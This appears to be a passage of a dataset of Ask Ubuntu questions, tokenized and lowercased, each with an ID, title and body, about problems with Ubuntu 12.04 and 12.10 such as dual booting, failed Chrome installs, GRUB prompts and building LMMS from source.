/lib/i386-linux-gnu/libnss_dns-2.15.so ee45d000-ee461000 rwxp 00000000 00:00 0 ee486000-ee4b8000 r-xp 00000000 08:06 23209512 /usr/lib/i386-linux-gnu/libdbusmenu-qt.so.2.6.0 ee4b8000-ee4b9000 r-xp 00031000 08:06 23209512 /usr/lib/i386-linux-gnu/libdbusmenu-qt.so.2.6.0 ee4b9000-ee4ba000 rwxp 00032000 08:06 23209512 /usr/lib/i386-linux-gnu/libdbusmenu-qt.so.2.6.0 ee4dc000-ee4fa000 r-xp 00000000 08:06 4200301 /usr/lib/i386-linux-gnu/qt4/plugins/systemtrayicon/libsni-qt.so ee4fa000-ee4fb000 r-xp 0001e000 08:06 4200301 /usr/lib/i386-linux-gnu/qt4/plugins/systemtrayicon/libsni-qt.so ee4fb000-ee4fc000 rwxp 0001f000 08:06 4200301 /usr/lib/i386-linux-gnu/qt4/plugins/systemtrayicon/libsni-qt.so ee4fc000-ee4fd000 -- -p 00000000 00:00 0 ee4fd000-eecfd000 rwxp 00000000 00:00 0 [ stack:10600 ] eed00000-eeded000 rwxp 00000000 00:00 0 eeded000-eee00000 -- -p 00000000 00:00 0 eee03000-eee15000 r-xp 00000000 08:06 20188634 /usr/share/fonts/type1/gsfonts/n019004l.pfb eee15000-eee6c000 r-xp 00000000 08:06 20188582 /usr/share/fonts/truetype/ubuntu-font-family/ubuntu-r.ttf eee6c000-eee97000 r-xp 00000000 08:06 23209498 /usr/lib/i386-linux-gnu/qt4/plugins/bearer/libqnmbearer.so eee97000-eee98000 r-xp 0002a000 08:06 23209498 /usr/lib/i386-linux-gnu/qt4/plugins/bearer/libqnmbearer.so eee98000-eee99000 rwxp 0002b000 08:06 23209498 /usr/lib/i386-linux-gnu/qt4/plugins/bearer/libqnmbearer.so eee99000-eeea5000 r-xp 00000000 08:06 23209499 /usr/lib/i386-linux-gnu/qt4/plugins/bearer/libqgenericbearer.so eeea5000-eeea6000 r-xp 0000b000 08:06 23209499 /usr/lib/i386-linux-gnu/qt4/plugins/bearer/libqgenericbearer.so eeea6000-eeea7000 rwxp 0000c000 08:06 23209499 /usr/lib/i386-linux-gnu/qt4/plugins/bearer/libqgenericbearer.so eeea7000-eeef6000 r-xp 00000000 08:06 17695017 /lib/i386-linux-gnu/libssl.so.1.0.0 eeef6000-eeef7000 -- -p 0004f000 08:06 17695017 /lib/i386-linux-gnu/libssl.so.1.0.0 eeef7000-eeef9000 r-xp 0004f000 08:06 17695017 /lib/i386-linux-gnu/libssl.so.1.0.0 eeef9000-eeefd000 rwxp 00051000 08:06 17695017 /lib/i386-linux-gnu/libssl.so.1.0.0 eeefd000-eeefe000 -- -p 00000000 00:00 0 eeefe000-ef6fe000 rwxp 00000000 00:00 0 [ stack:10599 ] ef6fe000-ef6ff000 -- -p 00000000 00:00 0 ef6ff000-efeff000 rwxp 00000000 00:00 0 [ stack:10598 ] efeff000-eff00000 -- -p 00000000 00:00 0 eff00000-f0700000 rwxp 00000000 00:00 0 [ stack:10597 ] f0700000-f0721000 rwxp 00000000 00:00 0 f0721000-f0800000 -- -p 00000000 00:00 0 f0800000-f0821000 rwxp 00000000 00:00 0 f0821000-f0900000 -- -p 00000000 00:00 0 f0900000-f0921000 rwxp 00000000 00:00 0 f0921000-f0a00000 -- -p 00000000 00:00 0 f0a06000-f0a44000 r-xp 00000000 08:06 23209497 /usr/lib/i386-linux-gnu/qt4/plugins/bearer/libqconnmanbearer.so f0a44000-f0a45000 r-xp 0003e000 08:06 23209497 /usr/lib/i386-linux-gnu/qt4/plugins/bearer/libqconnmanbearer.so f0a45000-f0a46000 rwxp 0003f000 08:06 23209497 /usr/lib/i386-linux-gnu/qt4/plugins/bearer/libqconnmanbearer.so f0a46000-f0aa6000 r-xp 00000000 08:06 23209514 /usr/lib/i386-linux-gnu/libtiff.so.4.3.4 f0aa6000-f0aa8000 r-xp 0005f000 08:06 23209514 /usr/lib/i386-linux-gnu/libtiff.so.4.3.4 f0aa8000-f0aa9000 rwxp 00061000 08:06 23209514 /usr/lib/i386-linux-gnu/libtiff.so.4.3.4 f0aa9000-f0afc000 r-xp 00000000 08:06 23209488 /usr/lib/i386-linux-gnu/libqtsvg.so.4.8.1 f0afc000-f0afd000 r-xp 00052000 08:06 23209488 /usr/lib/i386-linux-gnu/libqtsvg.so.4.8.1 f0afd000-f0afe000 rwxp 00053000 08:06 23209488 /usr/lib/i386-linux-gnu/libqtsvg.so.4.8.1 f0afe000-f0aff000 -- -p 00000000 00:00 0 f0aff000-f12ff000 rwxp 00000000 00:00 0 [ stack:10596 ] f12ff000-f1300000 -- -p 00000000 00:00 0 f1300000-f1b00000 rwxp 00000000 00:00 0 [ stack:10595 ] f1b00000-f1bed000 rwxp 00000000 00:00 0 f1bed000-f1c00000 -- -p 00000000 00:00 0 f1c22000-f1c42000 rwxp 00000000 00:00 0 f1c42000-f1c77000 r-xp 00000000 08:06 23209302 /usr/lib/i386-linux-gnu/liblcms.so.1.0.19 f1c77000-f1c78000 r-xp 00034000 08:06 23209302 /usr/lib/i386-linux-gnu/liblcms.so.1.0.19 f1c78000-f1c79000 rwxp 00035000 08:06 23209302 /usr/lib/i386-linux-gnu/liblcms.so.1.0.19aborted ( core dumped ) i get logged in for 1-2 seconds or so but then it closes .
220939	will ubuntu 12.10 run on intel core 2 duo 2.00ghz ?	i have a laptop with an intel core 2 duo and i do believe it supports 64-bit os . will ubuntu 12.10 64bit run on it without any trouble ? thanks !
220947	how to add silverlight to chrome in 12.04 ?	how to add silverlight to chrome in 12.04 ? i found a couple of guides to add moonlight plugin to chrome browser , but nothing that works as of yet .
220951	change which folders appear in dash	i 'm running 12.04 currently when i hit the super key , i get a search bar , my recent apps , my recent files , and my downloads directory . is there a way to change that to be my programming directory , or whatever ( ie . /home/me/downloads - > /home/me/programming ) ?
220952	ubuntu friendly pedometer without cloud enforcement ( data must be local )	can you recommend me a pedometer for ubuntu ? no cloud enforcement no online account on web interface data local with local software for analysis does nike fuel band , fitbit and others work on linux ?
220953	missing ppa-purge package ?	i want to upgrade banshee from version 2.0 to 2.6 on ubuntu 10.04 lucid . when i run sudo apt-get install ppa-purge i get the error message e : could n't find package ppa-purge . i am following instructions given in how do i update banshee to 2.4 ? thanks ! lou
220955	ca n't install alongside winxp	recently threw out older version of ubuntu because of failure to connect to router . then decided to try 12.10 . it connects easily . unfortunately i am not given the option to install alongside winxp . since the older version was so installed , i do not understand . if i click the 'install ' icon on the desktop i get a message 'installer has detected a mounted partition - ... . unmount or not ? ' i do not understand the significance of this . can anyone please help ? terminal info is : ubuntu @ ubuntu : ~ $ ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x06060605 device boot start end blocks id system /dev/sda1 * 63 312560639 156280288+ 7 hpfs/ntfs/exfat ubuntu @ ubuntu : ~ $ ubuntu @ ubuntu : ~ $ sudo parted -l model : ata wdc wd1600aajs-0 ( scsi ) disk /dev/sda : 160gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 160gb 160gb primary ntfs boot warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! ubuntu @ ubuntu : ~ $
220958	printers available in india that work with ubuntu 12.04	can anyone come up with multifunction laser printers available in india that work with ubuntu 12.04 ? i 'm asking because on most websites , i ca n't seem to find the models which are available on indian markets/shopping websites . i know that sometimes that does happen , because new models replace old ones at a delayed schedule here .
220960	can not install google chrome . how do i fix it ?	i ca n't install google chrome browser . i wonder why and how to fix it . here is the log i got from my terminal when installing google chrome . $ sudo dpkg -- install chrome.deb [ sudo ] password for young : selecting previously unselected package google-chrome-stable . ( reading database ... 141861 files and directories currently installed . ) unpacking google-chrome-stable ( from chrome.deb ) ... dpkg : dependency problems prevent configuration of google-chrome-stable : google-chrome-stable depends on libgconf2-4 ( > = 2.27.0 ) ; however : package libgconf2-4 is not installed . google-chrome-stable depends on libnss3-1d ( > = 3.12.3 ) ; however : package libnss3-1d is not installed . google-chrome-stable depends on libxss1 ; however : package libxss1 is not installed . dpkg : error processing google-chrome-stable ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for man-db ... errors were encountered while processing : google-chrome-stable $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : linux-headers-3.5.0-17 use 'apt-get autoremove ' to remove it . the following packages will be removed : google-chrome-stable 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 140 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 141960 files and directories currently installed . ) removing google-chrome-stable ... processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... $ sudo dpkg -- install chrome.deb selecting previously unselected package google-chrome-stable . ( reading database ... 141861 files and directories currently installed . ) unpacking google-chrome-stable ( from chrome.deb ) ... dpkg : dependency problems prevent configuration of google-chrome-stable : google-chrome-stable depends on libgconf2-4 ( > = 2.27.0 ) ; however : package libgconf2-4 is not installed . google-chrome-stable depends on libnss3-1d ( > = 3.12.3 ) ; however : package libnss3-1d is not installed . google-chrome-stable depends on libxss1 ; however : package libxss1 is not installed . dpkg : error processing google-chrome-stable ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for man-db ... errors were encountered while processing : google-chrome-stable it does not work in gui too . look at what i have got :
220962	unable to enter single-user ( recovery ) mode	i 'm running kubuntu 10.04 on an x86 machine , most updates applied . i need to get into single-user mode to install the latest nvidia drivers to support my new dual-display graphics card , but nothing seems to work . if i run sudo telinit 1 it starts the reboot , gets to the point where the splash screen is counting down ( cycling through the five dots ) and then just hangs . if i press { shift } during boot-up , i ( usually , but not always ) get to the grub menu ( v1.9-ish ) , select the recovery mode option with the latest kernel , and then see the screen with all the options but my keyboard is inoperative : no arrow keys work , for example , so i can not select the option i want . the only thing that works is { ctrl-alt-delete } to reboot . i am considering going into /etc/init/rc-sysinit.conf and setting the default-runlevel to s but am hoping there is a nicer way to clean up whatever is going on .
220963	dual monitor error on single monitor setup	i 'm running ubuntu 12.04 x86 . once i had two monitors and used the nvidia control panel to configure dual screen to get a single desktop stretched across the two monitors . then i had one monitor removed and now every time i login i get the following error mesage : how do i get rid of it ?
220964	recover wine menus in lubuntu 12.04	some error deleted my wine menus . ( lx panel was crashed by another app and the wine menu was gone ) wine is installed but not visible in the menu . do not flag as clone of similar questions ( like this or this ) because : these likely refer to ubuntu main and not to lubuntu , which means that : alcarte is not an option in lubuntu ( it does not work or does randomly - see this question and the end of this answer ) . i have tried it again anyway and wine was absent there too , and can not change it . considering this answer , i have not found any 'wine ' term in that file , nor in others that i found with similar name , excepting : /etc/xdg/menus/lxlauncher-applications.menu which contains the lines < move > < old > wine-wine < /old > < new > work/wine-wine < /new > and /usr/share/app-install/desktop/applications.menu which contains < menu > < name > applications < /name > < directory > x-gnome-menu-applications.directory < /directory > < appdir > . < /appdir > < ! -- we disable those here , otherwise we see e.g . wine menus -- > < ! -- read standard .directory and .desktop file locations -- > < ! -- < defaultappdirs/ > -- > < ! -- read in overrides and child menus from applications-merged/ -- > < ! -- < defaultmergedirs/ > -- > and also in /etc/xdg/menus/applications-merged , with the content < ! doctype menu public `` -//freedesktop//dtd menu 1.0//en '' '' http : //www.freedesktop.org/standards/menu-spec/menu-1.0.dtd '' > < menu > < name > applications < /name > < menu > < name > wine-wine < /name > < directory > wine-wine.directory < /directory > < include > < category > wine < /category > < /include > < menu > < name > wine-programs < /name > < directory > wine-programs.directory < /directory > < include > < category > wine-programs < /category > < /include > < menu > < name > wine-programs-accessories < /name > < directory > wine-programs-accessories.directory < /directory > < include > < category > wine-programs-accessories < /category > < /include > < /menu > < /menu > < /menu > < /menu > but can not see what could be changed here according to that answer . lxmenueditor does not display wine at all and it can not create main categories anyway as alacarte would ( see this ) , and wine was a such category . menulibre ( `` menu editor '' ) displays wine and its submenus . but the wine menu visibility can not be edited in this app . the same problem of not being able to create main categories ( as alacarte would ) , but only items . that is , individual items can be created and set to appear in certain categories but there 's no setting on these very categories .
220971	ca n't install updates nor plugins for rhythmbox and other software	i just installed ubuntu 12.10 alongside windows 7 and it seems a little lagged , running a bit slow . i attempt to check for uploads and plugins for rhythmbox and python , and it shows there are updates , but it gets stuck . also , the wireless icon shows that i 'm connected to my wifi network , but i ca n't load any site . i 'm a beginner here , do n't know if there 's a way to fix this or if i should reinstall ubuntu . in that case , is it possible to reinstall ubuntu alongside windows 7 ? how should i do it ?
220976	what is the difference between `` find '' and `` locate '' search methods in catfish ?	there seem to be two different methods of searching for files in catfish what is the difference ?
220979	what next ? what do i do at the grub prompt ? wubi install	so i installed ubuntu 12.04 and did the reboot as instructed . when i select ubuntu at the boot menu it takes me to a command line prompt grub > is that where i am supposed to be ? should of it gone to the desktop gui ? where do i go from here ?
220982	trouble installing server 12.10 - dead keyboard , blank screen , network config	installing 12.10 server from cd - minimal installation : basic system , ssh server , postgresql , manual updates . hardware is brand new hp server that also runs win 2003 server standard as a dnc excellently - i installed the grub boot manager on the primary partition and it is working fine - can boot to win or ubuntu without issue . everything seemed to go ok on the installation - but when i restarted the system after install and booted to ubuntu , i got the command prompt for ubuntu , but the keyboard was unrepsonsive - dead . there is nothing wrong with the keyboard - works fine if i boot to win . with a completely unrepsonsive keyboard i had to hit the power switch - when i restarted and booted to ubuntu , ubuntu started but no command prompt came up at all - just black screen . i powered down and rebooted to advanced ubuntu options - it tried to reinstall/initliaze a long list of packages - when it got to 'waiting for network configuration ' it waited , then a message 'waiting 60 seconds for network configuration ' ... it waited 60 seconds and then i got a 'failed to configure network message ' and it continued . finally it finished , i hit enter and got to a prompt - but again , keyboard unrepsonsive - dead . i went through this several times - tried 'repairing broken installation ' option and also reinstalling entirely - always same results . i am flummoxed . the only clue i have is that for the windows dnc config , the ip address is static - not via dhcp . but i do n't think that should impact ubuntu at all - perhaps i am mistaken . what is wrong ?
220983	system proxy seems not to work	i 'm using ubuntu 12.10 . i 've set up the system proxy like this : however , it seems this does not work since i can not log into google account in `` online account '' ( i live in china ) . how can i check whether the system proxy is working ? is there something wrong or do i need to check anything ?
220985	ati randeon x1500 , what to do ?	i have a pc with ubuntu 12.04 installed , it has an ati x1500 randeon , it 's a setup video of only 1024 x 768 , what to do ?
220993	building lmms : `` configuring incomplete , errors occurred ! ''	i tried to build linux multimedia studio from the source of the sourceforge git : // repository under ubuntu 12.04 lts 32b : git clone git : //lmms.git.sourceforge.net/gitroot/lmms/lmms cd lmms git checkout first i tried to install all the required libraries and then i cmaked . - that 's what happened on cmake ( errors occurred ! ) : [ dir ] lmms/build $ cmake .. -- the c compiler identification is gnu -- the cxx compiler identification is gnu -- check for working c compiler : /usr/bin/gcc -- check for working c compiler : /usr/bin/gcc -- works -- detecting c compiler abi info -- detecting c compiler abi info - done -- check for working cxx compiler : /usr/bin/c++ -- check for working cxx compiler : /usr/bin/c++ -- works -- detecting cxx compiler abi info -- detecting cxx compiler abi info - done processor : i686 machine : i686-linux-gnu -- target host is 32 bit -- looking for include files lmms_have_stdint_h -- looking for include files lmms_have_stdint_h - found -- looking for include files lmms_have_stdbool_h -- looking for include files lmms_have_stdbool_h - found -- looking for include files lmms_have_stdlib_h -- looking for include files lmms_have_stdlib_h - found -- looking for include files lmms_have_pthread_h -- looking for include files lmms_have_pthread_h - found -- looking for include files lmms_have_semaphore_h -- looking for include files lmms_have_semaphore_h - found -- looking for include files lmms_have_unistd_h -- looking for include files lmms_have_unistd_h - found -- looking for include files lmms_have_sys_types_h -- looking for include files lmms_have_sys_types_h - found -- looking for include files lmms_have_sys_ipc_h -- looking for include files lmms_have_sys_ipc_h - found -- looking for include files lmms_have_sys_shm_h -- looking for include files lmms_have_sys_shm_h - found -- looking for include files lmms_have_sys_time_h -- looking for include files lmms_have_sys_time_h - found -- looking for include files lmms_have_sys_wait_h -- looking for include files lmms_have_sys_wait_h - found -- looking for include files lmms_have_sys_select_h -- looking for include files lmms_have_sys_select_h - found -- looking for include files lmms_have_stdarg_h -- looking for include files lmms_have_stdarg_h - found -- looking for include files lmms_have_signal_h -- looking for include files lmms_have_signal_h - found -- looking for include files lmms_have_sched_h -- looking for include files lmms_have_sched_h - found -- looking for include files lmms_have_sys_soundcard_h -- looking for include files lmms_have_sys_soundcard_h - found -- looking for include files lmms_have_soundcard_h -- looking for include files lmms_have_soundcard_h - not found . -- looking for include files lmms_have_fcntl_h -- looking for include files lmms_have_fcntl_h - found -- looking for include files lmms_have_sys_ioctl_h -- looking for include files lmms_have_sys_ioctl_h - found -- looking for include files lmms_have_ctype_h -- looking for include files lmms_have_ctype_h - found -- looking for include files lmms_have_string_h -- looking for include files lmms_have_string_h - found -- looking for include files lmms_have_process_h -- looking for include files lmms_have_process_h - not found . -- looking for include files lmms_have_locale_h -- looking for include files lmms_have_locale_h - found -- looking for q_ws_x11 -- looking for q_ws_x11 - found -- looking for q_ws_win -- looking for q_ws_win - not found . -- looking for q_ws_qws -- looking for q_ws_qws - not found . -- looking for q_ws_mac -- looking for q_ws_mac - not found . -- found qt4 : /usr/bin/qmake ( found suitable version `` 4.8.1 '' , required is `` 4.6.0 ; components ; qtcore ; qtgui ; qtxml ; qtnetwork '' ) -- found qt translations in /usr/share/qt4/translations -- checking for module 'sndfile > =1.0.11' -- found sndfile , version 1.0.25 -- looking for include files cmake_have_pthread_h -- looking for include files cmake_have_pthread_h - found -- looking for pthread_create in pthreads -- looking for pthread_create in pthreads - not found -- looking for pthread_create in pthread -- looking for pthread_create in pthread - found -- found threads : true -- found libzip : /usr/lib/libzip.so -- found libflac++ : /usr/lib/i386-linux-gnu/libflac.so ; /usr/lib/i386-linux-gnu/libflac++.so -- found stk : /usr/lib/i386-linux-gnu/libstk.so -- checking for module 'portaudio-2.0' -- found portaudio-2.0 , version 19 -- found portaudio : portaudio ; asound ; m ; pthread -- checking for module 'libpulse' -- found libpulse , version 1.1 -- found pulseaudio simple : /usr/lib/i386-linux-gnu/libpulse.so -- looking for vorbis_bitrate_addblock in vorbis -- looking for vorbis_bitrate_addblock in vorbis - found -- found oggvorbis : /usr/lib/i386-linux-gnu/libogg.so ; /usr/lib/i386-linux-gnu/libvorbis.so ; /usr/lib/i386-linux-gnu/libvorbisfile.so ; /usr/lib/i386-linux-gnu/libvorbisenc.so -- looking for snd_seq_create_simple_port in asound -- looking for snd_seq_create_simple_port in asound - found -- found alsa : /usr/lib/i386-linux-gnu/libasound.so -- looking for include files lmms_have_machine_soundcard_h -- looking for include files lmms_have_machine_soundcard_h - not found . -- looking for include files lmms_have_linux_awe_voice_h -- looking for include files lmms_have_linux_awe_voice_h - not found . -- looking for include files lmms_have_awe_voice_h -- looking for include files lmms_have_awe_voice_h - not found . -- looking for include files lmms_have__usr_src_sys_i386_isa_sound_awe_voice_h -- looking for include files lmms_have__usr_src_sys_i386_isa_sound_awe_voice_h - not found . -- looking for include files lmms_have__usr_src_sys_gnu_i386_isa_sound_awe_voice_h -- looking for include files lmms_have__usr_src_sys_gnu_i386_isa_sound_awe_voice_h - not found . -- looking for c++ include sys/asoundlib.h -- looking for c++ include sys/asoundlib.h - found -- looking for c++ include alsa/asoundlib.h -- looking for c++ include alsa/asoundlib.h - found -- looking for snd_pcm_resume in asound -- looking for snd_pcm_resume in asound - found -- checking for module 'jack > =0.77' -- found jack , version 0.121.2 -- checking for module 'fftw3f > =3.0.0' -- package 'fftw3f > =3.0.0 ' not found cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:266 ( message ) : a required package was not found call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpkgconfig.cmake:320 ( _pkg_check_modules_internal ) cmakelists.txt:309 ( pkg_check_modules ) -- checking for module 'fluidsynth > =1.0.7' -- found fluidsynth , version 1.1.5 -- looking for include files lmms_have_lv2core -- looking for include files lmms_have_lv2core - found -- looking for include files lmms_have_slv2_scalepoints_h -- looking for include files lmms_have_slv2_scalepoints_h - not found . -- looking for slv2_world_new in slv2 -- looking for slv2_world_new in slv2 - found -- looking for librdf_new_world in rdf -- looking for librdf_new_world in rdf - found -- looking for wine_init in wine -- looking for wine_init in wine - found -- looking for c++ include windows.h -- looking for c++ include windows.h - found -- checking for module 'samplerate > =0.1.7' -- package 'samplerate > =0.1.7 ' not found -- performing test have_lrint -- performing test have_lrint - success -- performing test have_lrintf -- performing test have_lrintf - success -- performing test cpu_clips_positive -- performing test cpu_clips_positive - failed -- performing test cpu_clips_negative -- performing test cpu_clips_negative - success -- looking for xopendisplay in /usr/lib/i386-linux-gnu/libx11.so ; /usr/lib/i386-linux-gnu/libxext.so -- looking for xopendisplay in /usr/lib/i386-linux-gnu/libx11.so ; /usr/lib/i386-linux-gnu/libxext.so - found -- looking for gethostbyname -- looking for gethostbyname - found -- looking for connect -- looking for connect - found -- looking for remove -- looking for remove - found -- looking for shmat -- looking for shmat - found -- looking for iceconnectionnumber in ice -- looking for iceconnectionnumber in ice - found -- found x11 : /usr/lib/i386-linux-gnu/libx11.so -- found freetype : /usr/lib/i386-linux-gnu/libfreetype.so installation summary -- -- -- -- -- -- -- -- -- -- * install directory : /usr/local * use system 's libsamplerate : supported audio interfaces -- -- -- -- -- -- -- -- -- -- -- -- -- * alsa : ok * jack : ok * oss : ok * portaudio : ok * pulseaudio : ok * sdl : ok supported midi interfaces -- -- -- -- -- -- -- -- -- -- -- -- - * alsa : ok * oss : ok * winmm : < not supported on this platform > supported file formats for project export -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - * wave : ok * ogg/vorbis : ok * flac : ok optional plugins -- -- -- -- -- -- -- -- * soundfont2 player : ok * stk mallets : ok * vst-instrument hoster : ok * vst-effect hoster : ok * lv2 hoster : ok * calf ladspa plugins : ok * caps ladspa plugins : ok * cmt ladspa plugins : ok * tap ladspa plugins : ok * swh ladspa plugins : ok * fl .zip import : ok -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - important : after installing missing packages , remove cmakecache.txt before running cmake again ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- configuring incomplete , errors occurred ! here are some parts the contents of my lmms/build/cmakecache.txt file : # this is the cmakecache file . # for build in directory : /home/jk/downloads/lmms-git/lmms/build # it was generated by cmake : /usr/bin/cmake # you can edit this file to change values found and used by cmake . # if you do not want to change any of the values , simply exit the editor . # if you do want to change a value , simply edit , save , and exit the editor . # the syntax for the file is as follows : # key : type=value # key is the name of a variable in the cache . # type is a hint to gui 's for the type of value , do not edit type ! . # value is the current value for the key . # # # # # # # # # # # # # # # # # # # # # # # # # external cache entries # # # # # # # # # # # # # # # # # # # # # # # # //path to a file . alsa_includes : path=/usr/include //path to a library . asound_library : filepath=/usr/lib/i386-linux-gnu/libasound.so //path to a program . cmake_ar : filepath=/usr/bin/ar //choose the type of build , options are : none ( cmake_cxx_flags or // cmake_c_flags used ) debug release relwithdebinfo minsizerel . cmake_build_type : string= //enable/disable color output during build . cmake_color_makefile : bool=on //cxx compiler . cmake_cxx_compiler : filepath=/usr/bin/c++ //flags used by the compiler during all build types . cmake_cxx_flags : string= //flags used by the compiler during debug builds . cmake_cxx_flags_debug : string=-g //flags used by the compiler during release minsize builds . cmake_cxx_flags_minsizerel : string=-os -dndebug //flags used by the compiler during release builds ( /md /ob1 /oi // /ot /oy /gs will produce slightly less optimized but smaller // files ) . cmake_cxx_flags_release : string=-o3 -dndebug //flags used by the compiler during release with debug info builds . cmake_cxx_flags_relwithdebinfo : string=-o2 -g //c compiler . cmake_c_compiler : filepath=/usr/bin/gcc //flags used by the compiler during all build types . cmake_c_flags : string= //flags used by the compiler during debug builds . cmake_c_flags_debug : string=-g //flags used by the compiler during release minsize builds . cmake_c_flags_minsizerel : string=-os -dndebug //flags used by the compiler during release builds ( /md /ob1 /oi // /ot /oy /gs will produce slightly less optimized but smaller // files ) . cmake_c_flags_release : string=-o3 -dndebug //flags used by the compiler during release with debug info builds . cmake_c_flags_relwithdebinfo : string=-o2 -g //flags used by the linker . cmake_exe_linker_flags : string= ' ' //flags used by the linker during debug builds . cmake_exe_linker_flags_debug : string= //flags used by the linker during release minsize builds . cmake_exe_linker_flags_minsizerel : string= //flags used by the linker during release builds . cmake_exe_linker_flags_release : string= //flags used by the linker during release with debug info builds . cmake_exe_linker_flags_relwithdebinfo : string= //enable/disable output of compile commands during generation . cmake_export_compile_commands : bool=off //install path prefix , prepended onto install directories . cmake_install_prefix : path=/usr/local //path to a program . cmake_linker : filepath=/usr/bin/ld //path to a program . cmake_make_program : filepath=/usr/bin/make //flags used by the linker during the creation of modules . cmake_module_linker_flags : string= ' ' //flags used by the linker during debug builds . cmake_module_linker_flags_debug : string= //flags used by the linker during release minsize builds . cmake_module_linker_flags_minsizerel : string= //flags used by the linker during release builds . cmake_module_linker_flags_release : string= //flags used by the linker during release with debug info builds . cmake_module_linker_flags_relwithdebinfo : string= == [ ... ] == that 's a list of the contents of my lmms/build folder : [ dir ] lmms/build $ dir cmakecache.txt cpacksourceconfig.cmake lmmsconfig.h plugins cmakefiles data lmms.rc cpackconfig.cmake include lmmsversion.h my question : it just tells me that that `` errors '' occurred , but i ca n't see any error message . it seems like everything went fine . - so : any idea what the problem could be ? - thanks .
220994	screen not locked after suspen ( run from terminal )	i have just found a answer to my question `` how can i hibernate/suspend from the command line and do so at a specific time and a relative time ? '' . the thing though is that on many occasions the resume is back with an unlocked screen ! it 's not always , but most of the time . why & how can i make sure it locks ?
220995	encoding and decoding in gedit	sometimes in gedit , when i save a text file with special characters ( such as greek characters , math notations , chinese characters ) i copy from some webpage and am about the exit gedit , it will warn me to choose a proper encoding for the special characters , and i always choose one encoding ( utf-16 seems always work in all my cases ) until no more warning . but sometimes it does n't warn , and i will think the default encoding will work . later when i open some text files saved this way , some text files do not show their special characters correctly , but as some nonsense . i was worried whether the special characters have been altered by gedit either during saving or opening , and can no longer be decoded correctly even by its proper decoding method when i find out what it is ? sometimes when i open the same text file under windows 7 with notepad , special characters can be shown as nonsense . i wonder if opening in notepad will alter the text files , such that i may no longer be able to read them properly when i am back to ubuntu ? i was wondering what i can do to prevent such case from happenning ? thanks !
221000	dual booting 12.10 and win 7 - boots directly to win 7	and thank you kindly for you help ! i 'll preface this with saying that i realize this is a common problem , with lots of trouble-shooting guides available online ; however , after multiple attempts with different guides , i 've made zero progress and am hoping to someone could help me with my specific scenario . first , my story : -initially , i installed ubuntu 12.10 with the `` something else '' option with no problems . used 4 gb swap logical partition , 26 gb primary root partition . wanting to trying out mint 13 , i booted into windows from grub2 , used the latest version of easybcd ( v2.2 ) to restore the windows 7 bootloader to the mbr , deleted the ubuntu partitions , reformatted them in ntfs . i then created a 30 gb partition of free space for mint . i installed mint using the same partitioning described above for ubuntu 12.10 , using /dev/sda for the boot installation files , and everything seemed to go well , until i re-booted my computer and it went straight to windows - i could find no way to get into mint . so i went into windows , restored windows bootloader to the mbr w/ easybcd , deleted partitions , etc. , as i figured i 'd done enough messing around and would go with ubuntu 12.10 . now the problem : i restarted my computer booting from the same ubuntu usb key i originally used . briefly , `` error : `` prefix '' is not set '' flashed on screen , and instead of being greeted with the gui menu of `` try vs. install ubuntu '' , there was a menu with minimal graphics ( like a bios menu ) where i could select install , run from usb , etc . after selecting `` install ubuntu '' , the familiar install wizard with a gui came up , i partitioned my drive as described , /dev/sda for the boot installation files , install went well , rebooted and ... straight to windows . this is where i 'm at . fixes i 've tried : -this guide : how can i repair grub ? ( how to get ubuntu back after installing windows ? ) to ensure grub is on the mbr . i followed all steps , but still when i reboot , i go directly into windows . -installing 12.04 instead of 12.10 - same issue -re-installed ubuntu , writing the boot files to their own partition , then using easybcd to to add a boot option for ubuntu using the windows bootloader , ensuring i instruct easybcd to look at the partition i created with the ubuntu installer ( instructions here http : //neosmart.net/wiki/display/ebcd/ubuntu ) . when i reboot , i select the ubuntu option , and it puts me in grub4dos , with a cursor waiting for input . i have no idea what to put here , so i would just type `` reboot '' to exit out . and this is where i am now . any clue as to why i ca n't boot into ubuntu ? my computer specs are : asus ux31a core i7 , win 7 64 pro , 256 gb ssd , intel hm76 chipset and integrated intel hd 4000 graphics , 4 gb memory i 've tried to be as clear as possible , but i 'd be happy to provide any info that would help anyone along . thanks for your patience in reading this ! sincerely , -mn
221003	a program/command to help translate multiple file names	i have hundreds of files with different names that i want to translate into a different language . is there an application/cli action that would allow me to copy all this names as in a list/table and then , after having translated them , to paste them back into the list/table , or that would allow a procedure somewhat similar to `` rename '' in thunar but with a more complex action closer to what i have described ? ( i am in lubuntu and i prefer not to use nautilus due to unwanted interference with lxde/pcmanfm desktop and lxpanel . if there is a solution in nautilus please provide it but try to give an alternative if possible . )
221007	full volume after each boot in 12.10	after upgrading to 12.10 the sound volume is always max after bootup . on another computer running 12.10 this does not happen . what can i check ? is there a setting for this ?
